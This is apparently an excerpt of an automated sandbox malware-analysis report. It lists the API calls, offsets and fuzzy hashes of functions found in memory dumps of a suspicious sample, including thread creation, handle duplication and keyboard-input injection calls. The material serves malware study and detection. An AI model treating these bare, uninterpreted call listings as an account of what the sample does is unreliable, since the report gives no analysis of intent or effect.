                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocateHeap_free_malloc
                                                                                                                                              • String ID: [B
                                                                                                                                              • API String ID: 1020059152-632041663
                                                                                                                                              • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                                                                                              • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                                                                                                              • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                                                                                              • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                                                                                                              APIs
                                                                                                                                              • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                                                                                                              • __calloc_crt.LIBCMT ref: 00413DB0
                                                                                                                                              • __getptd.LIBCMT ref: 00413DBD
                                                                                                                                              • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                                                                                                              • _free.LIBCMT ref: 00413E07
                                                                                                                                              • __dosmaperr.LIBCMT ref: 00413E12
                                                                                                                                                • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 155776804-0
                                                                                                                                              • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                                                                                              • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                                                                                                              • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                                                                                              • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                                                                                                                • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                                                                                                              • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                                                                                                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                                                                                                              • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1957940570-0
                                                                                                                                              • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                                                                              • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                                                                                                              • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                                                                              • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                                                                                                              APIs
                                                                                                                                              • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                                                                                                • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                                                                • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                                                              • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                                                                                                • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                                                              • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                                                                                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                                                                                              • ExitThread.KERNEL32 ref: 00413D4E
                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                                                                                              • __freefls@4.LIBCMT ref: 00413D74
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 259663610-0
                                                                                                                                              • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                                                                                              • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                                                                                                                                              • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                                                                                              • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                                                                                                                                              APIs
                                                                                                                                              • GetClientRect.USER32(?,?), ref: 004302E6
                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00430364
                                                                                                                                              • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 004303C3
                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 004303EC
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3220332590-0
                                                                                                                                              • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                                                                              • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                                                                                                              • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                                                                              • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1612042205-0
                                                                                                                                              • Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                                                                                                              • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                                                                                                              • Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                                                                                                              • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _memmove_strncmp
                                                                                                                                              • String ID: >$U$\
                                                                                                                                              • API String ID: 2666721431-237099441
                                                                                                                                              • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                                                                                              • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                                                                                                              • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                                                                                              • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                                                                                                              APIs
                                                                                                                                              • GetKeyboardState.USER32(?), ref: 0044C570
                                                                                                                                              • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                                                                                                              • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                                                                                                              • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                                                                                                              • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                                                                                                              • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessagePost$KeyboardState$InputSend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2221674350-0
                                                                                                                                              • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                                                                              • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                                                                                                              • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                                                                              • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _wcscpy$_wcscat
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2037614760-0
                                                                                                                                              • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                                                                                              • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                                                                                                              • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                                                                                              • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                                                                                                              APIs
                                                                                                                                              • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Variant$Copy$AllocClearErrorLastString
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 960795272-0
                                                                                                                                              • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                                                                                              • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                                                                                                              • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                                                                                              • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                                                                                                              APIs
                                                                                                                                              • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                                                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                                                                                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                                                                                              • EndPaint.USER32(?,?), ref: 00447D13
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4189319755-0
                                                                                                                                              • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                                                                              • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                                                                                                              • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                                                                              • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                                                                                                              APIs
                                                                                                                                              • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                                                                                                              • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                                                                                                              • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$LongWindow$InvalidateRect
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1976402638-0
                                                                                                                                              • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                                                                                              • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                                                                                                              • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                                                                                              • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                                                                                                              APIs
                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                                                                                                              • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                                                                                                              • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                                                                                                              • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                                                                                                              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$Show$Enable$MessageSend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 642888154-0
                                                                                                                                              • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                                                                              • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                                                                                                              • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                                                                              • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
